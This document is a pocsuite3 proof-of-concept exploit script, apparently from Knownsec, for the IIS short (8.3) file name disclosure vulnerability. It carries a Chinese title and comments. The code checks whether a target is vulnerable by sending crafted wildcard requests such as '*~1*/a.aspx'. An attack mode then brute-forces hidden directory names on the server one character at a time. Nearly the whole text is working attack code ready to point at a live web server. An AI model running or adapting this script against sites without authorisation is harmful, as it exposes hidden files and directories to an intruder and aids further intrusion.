IIS <7.5 8.3格式短文件名导致的信息泄漏

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.lib.utils import random_str from urllib.parse import urlparse from urllib.parse import quote class iis_short_burst(): def __init__(self,domain): self.magic_part = "*/a.aspx" self.magic_filename = "*~1" self.magic_ext = "*~1." p = urlparse(domain) self.url = "{0}://{1}/".format(p.scheme, p.netloc) brute_str = "0123456789abcdefghijklmnopqrstuvwxyz!#$%&'()-@^_`{}~" self.brute_list = list(brute_str) self.foder = None def isReliable(self, direc): bRc = False try: validStatus = requests.get(direc + self.magic_filename + self.magic_part).status_code except: validStatus = 0 try: invalidStatus = requests.get(direc + random_str(length=10) + self.magic_filename + self.magic_part).status_code except: invalidStatus = 0 if validStatus != invalidStatus: try: anoinvalidStatus = requests.get(direc + random_str(11) + self.magic_filename + self.magic_part).status_code except: anoinvalidStatus = 0 if anoinvalidStatus == invalidStatus: bRc = True return bRc # 判断当前暴力破解项类型是否为目录 def isFolder(self, iCountofName): checkUrl = self.url + "/" + "%3f" * iCountofName + "~1/.aspx" statusCode = requests.get(checkUrl).status_code if statusCode == 404: return True else: return False # 分别获得文件名称和后缀名长度 def getCountofNameandExt(self): iCountofName = 6 for i in range(1, 7): checkUrl = self.url + "/" + "%3f" * i + "~1." + self.magic_part statusCode = requests.get(checkUrl).status_code if statusCode == 404: iCountofName = i break if self.isFolder(iCountofName): return iCountofName, 0 else: iCountofExt = 1 while True: statusCode = requests.get(self.url + "/" + "%3f" * iCountofName + "~1." + "%3f" * iCountofExt + "/.aspx").status_code if statusCode == 400: iCountofExt += 1 else: break return iCountofName, iCountofExt def verify(self): return self.isReliable(self.url) def attack(self): iCountName, iCountExt = self.getCountofNameandExt() self.foder = self.dfs_folder('', iCountName) return self.foder # 递归实现爆破目录名 def dfs_folder(self, dic, num): if num == 0: return self.url + dic for d in self.brute_list: check = quote(dic + d) if self.isReliable(self.url + check): return self.dfs_folder(check, num - 1) class DemoPOC(POCBase): vulID = '0848' # ssvid version = '1.0' author = ['chenghs@knownsec.com'] vulDate = '2012-07-02' createDate = '2012-07-09' updateDate = '2012-07-09' references = ['http://www.exploit-db.com/exploits/19525/'] name = 'IIS Short File/Folder Name Disclosure' appPowerLink = 'http://www.microsoft.com' appName = 'IIS' appVersion = '7.5' vulType = 'Information Disclosure' desc = '''It is possible to detect short names of files and directories which have an 8.3 file naming scheme equivalent in Windows by using some vectors in several versions of Microsoft IIS. ''' samples = [] install_requires = [''] def _verify(self): result = {} h = iis_short_burst(self.url) if h.verify(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Postdata'] = self.url + "*~1*/a.aspx" return self.parse_output(result) def _attack(self): h = iis_short_burst(self.url) flag = h.attack() result = {} if flag: result['SiteAttr'] = flag return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(DemoPOC)